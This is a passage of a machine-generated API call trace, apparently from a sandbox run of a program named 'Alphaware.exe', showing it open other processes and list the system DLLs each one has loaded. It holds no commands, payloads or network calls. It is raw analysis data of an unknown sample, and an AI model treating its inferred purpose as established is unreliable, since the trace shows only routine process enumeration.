GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0051.571] CoTaskMemFree (pv=0x782320) [0051.571] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0051.572] CoTaskMemFree (pv=0x782320) [0051.572] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x2496218, cb=0x18 | out: lpmodinfo=0x2496218*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0051.573] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0051.574] CoTaskMemFree (pv=0x782320) [0051.574] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0051.575] CoTaskMemFree (pv=0x782320) [0051.575] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd790000, lpmodinfo=0x24983d8, cb=0x18 | out: lpmodinfo=0x24983d8*(lpBaseOfDll=0x7fefd790000, SizeOfImage=0xc000, EntryPoint=0x7fefd793e50)) returned 1 [0051.577] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd790000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="sxssrv.DLL") returned 0xa [0051.578] CoTaskMemFree (pv=0x782320) [0051.578] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd790000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sxssrv.DLL" (normalized: "c:\\windows\\system32\\sxssrv.dll")) returned 0x1e [0051.579] CoTaskMemFree (pv=0x782320) [0051.579] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd680000, lpmodinfo=0x249a598, cb=0x18 | out: lpmodinfo=0x249a598*(lpBaseOfDll=0x7fefd680000, SizeOfImage=0x91000, EntryPoint=0x7fefd681440)) returned 1 [0051.580] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd680000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="sxs.dll") returned 0x7 [0051.581] CoTaskMemFree (pv=0x782320) [0051.581] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd680000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")) returned 0x1b [0051.583] CoTaskMemFree (pv=0x782320) [0051.583] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x249c748, cb=0x18 | out: lpmodinfo=0x249c748*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0051.584] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0051.585] CoTaskMemFree (pv=0x782320) [0051.585] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0051.586] CoTaskMemFree (pv=0x782320) [0051.587] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x249e908, cb=0x18 | out: lpmodinfo=0x249e908*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0051.588] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0051.589] CoTaskMemFree (pv=0x782320) [0051.589] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0051.591] CoTaskMemFree (pv=0x782320) [0051.591] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x24a0ad8, cb=0x18 | out: lpmodinfo=0x24a0ad8*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0051.592] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0051.594] CoTaskMemFree (pv=0x782320) [0051.594] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0051.595] CoTaskMemFree (pv=0x782320) [0051.595] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x24a2dc0, cb=0x18 | out: lpmodinfo=0x24a2dc0*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0051.596] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0051.598] CoTaskMemFree (pv=0x782320) [0051.598] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0051.600] CoTaskMemFree (pv=0x782320) [0051.600] CloseHandle (hObject=0x218) returned 1 [0051.603] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0051.603] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x904) returned 0x218 [0051.603] EnumProcessModules (in: hProcess=0x218, lphModule=0x24a58e0, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x24a58e0, lpcbNeeded=0x41eb20) returned 1 [0051.604] GetModuleInformation (in: hProcess=0x218, hModule=0xbd0000, lpmodinfo=0x24a5b50, cb=0x18 | out: lpmodinfo=0x24a5b50*(lpBaseOfDll=0xbd0000, SizeOfImage=0x17000, EntryPoint=0xbd14a1)) returned 1 [0051.604] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.604] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xbd0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0051.605] CoTaskMemFree (pv=0x782320) [0051.605] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.605] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xbd0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Journal\\spgagentservice.exe" (normalized: "c:\\program files\\windows journal\\spgagentservice.exe")) returned 0x34 [0051.605] CoTaskMemFree (pv=0x782320) [0051.606] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x24a7d88, cb=0x18 | out: lpmodinfo=0x24a7d88*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0051.606] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.606] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0051.607] CoTaskMemFree (pv=0x782320) [0051.607] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.607] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0051.608] CoTaskMemFree (pv=0x782320) [0051.608] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x24a9f48, cb=0x18 | out: lpmodinfo=0x24a9f48*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0051.608] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.608] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0051.609] CoTaskMemFree (pv=0x782320) [0051.609] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.609] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0051.610] CoTaskMemFree (pv=0x782320) [0051.610] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x24ac108, cb=0x18 | out: lpmodinfo=0x24ac108*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0051.610] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.610] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0051.611] CoTaskMemFree (pv=0x782320) [0051.611] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.611] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0051.612] CoTaskMemFree (pv=0x782320) [0051.612] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x24ae2f0, cb=0x18 | out: lpmodinfo=0x24ae2f0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0051.612] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.612] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0051.613] CoTaskMemFree (pv=0x782320) [0051.613] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.613] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0051.614] CoTaskMemFree (pv=0x782320) [0051.614] CloseHandle (hObject=0x218) returned 1 [0051.615] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0051.616] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3a0) returned 0x218 [0051.616] EnumProcessModules (in: hProcess=0x218, lphModule=0x24b0a00, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x24b0a00, lpcbNeeded=0x41eb20) returned 1 [0051.618] GetModuleInformation (in: hProcess=0x218, hModule=0xffc70000, lpmodinfo=0x24b0c70, cb=0x18 | out: lpmodinfo=0x24b0c70*(lpBaseOfDll=0xffc70000, SizeOfImage=0x23000, EntryPoint=0xffc749d4)) returned 1 [0051.618] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.618] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xffc70000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="Dwm.exe") returned 0x7 [0051.619] CoTaskMemFree (pv=0x782320) [0051.619] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.619] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xffc70000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\Dwm.exe" (normalized: "c:\\windows\\system32\\dwm.exe")) returned 0x1b [0051.619] CoTaskMemFree (pv=0x782320) [0051.619] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x24b2e58, cb=0x18 | out: lpmodinfo=0x24b2e58*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0051.620] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.620] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0051.620] CoTaskMemFree (pv=0x782320) [0051.621] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.621] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0051.621] CoTaskMemFree (pv=0x782320) [0051.621] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x24b5018, cb=0x18 | out: lpmodinfo=0x24b5018*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0051.622] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.622] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0051.622] CoTaskMemFree (pv=0x782320) [0051.622] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.623] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0051.623] CoTaskMemFree (pv=0x782320) [0051.623] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x24b71e8, cb=0x18 | out: lpmodinfo=0x24b71e8*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0051.624] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.624] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0051.624] CoTaskMemFree (pv=0x782320) [0051.624] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.624] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0051.625] CoTaskMemFree (pv=0x782320) [0051.625] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x24b93b8, cb=0x18 | out: lpmodinfo=0x24b93b8*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0051.626] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.626] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0051.626] CoTaskMemFree (pv=0x782320) [0051.626] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.626] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0051.627] CoTaskMemFree (pv=0x782320) [0051.627] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x24bb5d0, cb=0x18 | out: lpmodinfo=0x24bb5d0*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0051.628] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.628] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0051.629] CoTaskMemFree (pv=0x782320) [0051.629] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.629] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0051.630] CoTaskMemFree (pv=0x782320) [0051.630] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x24bd790, cb=0x18 | out: lpmodinfo=0x24bd790*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0051.630] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.630] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0051.631] CoTaskMemFree (pv=0x782320) [0051.631] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.632] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0051.633] CoTaskMemFree (pv=0x782320) [0051.633] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x24bf940, cb=0x18 | out: lpmodinfo=0x24bf940*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0051.633] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.633] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0051.634] CoTaskMemFree (pv=0x782320) [0051.634] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.634] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0051.635] CoTaskMemFree (pv=0x782320) [0051.635] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x24c1b00, cb=0x18 | out: lpmodinfo=0x24c1b00*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0051.636] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.636] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0051.637] CoTaskMemFree (pv=0x782320) [0051.637] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.637] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0051.638] CoTaskMemFree (pv=0x782320) [0051.638] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc0d0000, lpmodinfo=0x24c3d58, cb=0x18 | out: lpmodinfo=0x24c3d58*(lpBaseOfDll=0x7fefc0d0000, SizeOfImage=0x56000, EntryPoint=0x7fefc0dbbc0)) returned 1 [0051.640] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.640] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc0d0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="UxTheme.dll") returned 0xb [0051.641] CoTaskMemFree (pv=0x782320) [0051.641] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.641] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc0d0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\UxTheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")) returned 0x1f [0051.642] CoTaskMemFree (pv=0x782320) [0051.642] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x24c5f18, cb=0x18 | out: lpmodinfo=0x24c5f18*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0051.643] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.643] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="IMM32.dll") returned 0x9 [0051.644] CoTaskMemFree (pv=0x782320) [0051.644] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.644] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0051.645] CoTaskMemFree (pv=0x782320) [0051.646] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x24c80d8, cb=0x18 | out: lpmodinfo=0x24c80d8*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0051.647] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.647] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0051.648] CoTaskMemFree (pv=0x782320) [0051.648] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.648] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0051.649] CoTaskMemFree (pv=0x782320) [0051.649] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb0a0000, lpmodinfo=0x24ca2b0, cb=0x18 | out: lpmodinfo=0x24ca2b0*(lpBaseOfDll=0x7fefb0a0000, SizeOfImage=0x27000, EntryPoint=0x7fefb0a7254)) returned 1 [0051.650] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.650] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb0a0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="dwmredir.dll") returned 0xc [0051.651] CoTaskMemFree (pv=0x782320) [0051.651] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.651] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb0a0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmredir.dll" (normalized: "c:\\windows\\system32\\dwmredir.dll")) returned 0x20 [0051.652] CoTaskMemFree (pv=0x782320) [0051.652] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefaf00000, lpmodinfo=0x24cc480, cb=0x18 | out: lpmodinfo=0x24cc480*(lpBaseOfDll=0x7fefaf00000, SizeOfImage=0x192000, EntryPoint=0x7fefaf5700c)) returned 1 [0051.653] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.654] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefaf00000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="dwmcore.dll") returned 0xb [0051.655] CoTaskMemFree (pv=0x782320) [0051.655] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.655] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefaf00000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmcore.dll" (normalized: "c:\\windows\\system32\\dwmcore.dll")) returned 0x1f [0051.656] CoTaskMemFree (pv=0x782320) [0051.656] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x24ce640, cb=0x18 | out: lpmodinfo=0x24ce640*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0051.657] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.657] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0051.659] CoTaskMemFree (pv=0x782320) [0051.659] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.659] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0051.660] CoTaskMemFree (pv=0x782320) [0051.660] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x24d0810, cb=0x18 | out: lpmodinfo=0x24d0810*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0051.661] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.661] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0051.665] CoTaskMemFree (pv=0x782320) [0051.665] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.665] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0051.666] CoTaskMemFree (pv=0x782320) [0051.666] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x24d29d0, cb=0x18 | out: lpmodinfo=0x24d29d0*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0051.667] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.667] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0051.669] CoTaskMemFree (pv=0x782320) [0051.669] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.669] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0051.671] CoTaskMemFree (pv=0x782320) [0051.671] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbb30000, lpmodinfo=0x24d4ca8, cb=0x18 | out: lpmodinfo=0x24d4ca8*(lpBaseOfDll=0x7fefbb30000, SizeOfImage=0x12a000, EntryPoint=0x7fefbb33810)) returned 1 [0051.672] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.672] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbb30000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="WindowsCodecs.dll") returned 0x11 [0051.673] CoTaskMemFree (pv=0x782320) [0051.674] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.674] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbb30000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll")) returned 0x25 [0051.675] CoTaskMemFree (pv=0x782320) [0051.675] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff760000, lpmodinfo=0x24d6e88, cb=0x18 | out: lpmodinfo=0x24d6e88*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0051.676] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.677] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff760000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0051.678] CoTaskMemFree (pv=0x782320) [0051.678] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.678] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff760000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0051.680] CoTaskMemFree (pv=0x782320) [0051.680] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefaec0000, lpmodinfo=0x24d9048, cb=0x18 | out: lpmodinfo=0x24d9048*(lpBaseOfDll=0x7fefaec0000, SizeOfImage=0x34000, EntryPoint=0x7fefaee7cac)) returned 1 [0051.681] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.681] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefaec0000, lpBaseName=0x782320, 